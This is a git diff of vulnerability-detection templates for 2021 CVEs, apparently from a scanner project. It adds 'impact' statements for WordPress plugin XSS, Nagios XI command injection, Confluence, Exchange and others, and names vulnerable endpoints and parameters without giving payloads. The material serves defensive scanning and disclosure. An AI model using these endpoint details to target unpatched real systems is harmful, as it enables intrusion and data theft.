@@ -6,6 +6,8 @@ info: severity: medium description: | The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.9.6. reference: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index b202a4b5fe..eee36282f3 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. remediation: | Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed. reference: diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 9ad31424fd..44ef45ab51 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml 
@@ -6,6 +6,8 @@ info: severity: low description: | WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.5.1. reference: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 3b549083e8..ee2edf61a5 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.9.0 reference: - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 281155b8ef..519e9d5cb3 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 094e8177a7..68e5f34940 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 94d59a65c9..6831320303 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml 
@@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.9.5. reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index bfabd96388..a28526a088 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. remediation: | Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 559c3259ce..2239313465 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index e09fcadd57..0e029192fb 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 700e06b021..6756454ae1 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml 
@@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: Fixed in version 17.3. reference: - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 1f45935357..4a5af0001c 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 50b16d5ca5..2b8263cc57 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 1dc28fc9f5..8f18ea17d7 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 216a63294c..7866b62f8e 100644 
--- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Druid. reference: diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index d1673d2380..8402d27bf3 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Apply the latest security patch or update to a non-vulnerable version of Hue Magic. reference: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 2e7c1d2104..198d295156 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 10369d9c7f..ed297fce3e 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk,philippedelteil severity: critical description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: | Apply the latest security patches provided by Atlassian to mitigate this vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 99d0721b9f..8622f42cdc 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index cf7020a4e4..2284ac4f46 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -5,6 +5,8 @@ info: author: cocxanh severity: medium description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + impact: | + This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading to a complete compromise of the affected system. remediation: | Apply the latest security patches and updates provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 8c8849cb6f..230fbbb8df 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: Cacti contains a cross-site scripting vulnerability via "http:///auth_changepassword.php?ref=" which can successfully execute the JavaScript payload present in the "ref" URL parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of Cacti to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index bc6c4713ba..d18c491ea4 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index 140b88e854..3a098d554e 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 367e83c8a4..55893da081 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -5,6 +5,8 @@ info: author: gy741,pdteam severity: medium description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index ba3f7fb1bf..68adf2a6e8 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml 
@@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index 8da4e9a6ad..d6d8b5fa8d 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 3ea563f107..e1625f1cd1 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2. reference: diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 638d1b6eeb..89b7d6ac1b 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -5,6 +5,8 @@ info: author: aceseven (digisec360) severity: medium description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 8c3ec7fcd9..9ece21f683 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system. remediation: Apply the appropriate security update. reference: - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 02a1929e04..3c9f3b6c2a 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index ff6b059eeb..c36b353a79 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header. + impact: | + Successful exploitation of this vulnerability could lead to various attacks, including session hijacking, cross-site scripting (XSS), and cache poisoning. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 4b57615c9a..d3bf09fd80 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 2ee3be43db..60311b973e 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml 
@@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "language" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 99c90f0c20..840808e120 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index e69731e2fb..890d279135 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 369b3531ab..25fa374933 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index aa30b7c9dc..73ba4d9bb6 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 83bf28b5cf..46059ee873 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 381d356781..51d0e9bf08 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Triconsole Datepicker Calendar before 3.77 contains a cross-site scripting vulnerability in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Triconsole Datepicker Calendar that properly validates user input to prevent XSS attacks. reference: diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index eddc5dc5ab..edda947971 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam,bing0o severity: high description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set. + impact: | + An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure. remediation: | Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 69dd47543f..cd5f31f29f 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 426988e263..2c7a2e7be3 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 12598f1e72..5ddb6a2c74 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -5,6 +5,8 @@ info: author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Update to the latest firmware version provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 1e217d1a6c..9eb61ce54b 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml 
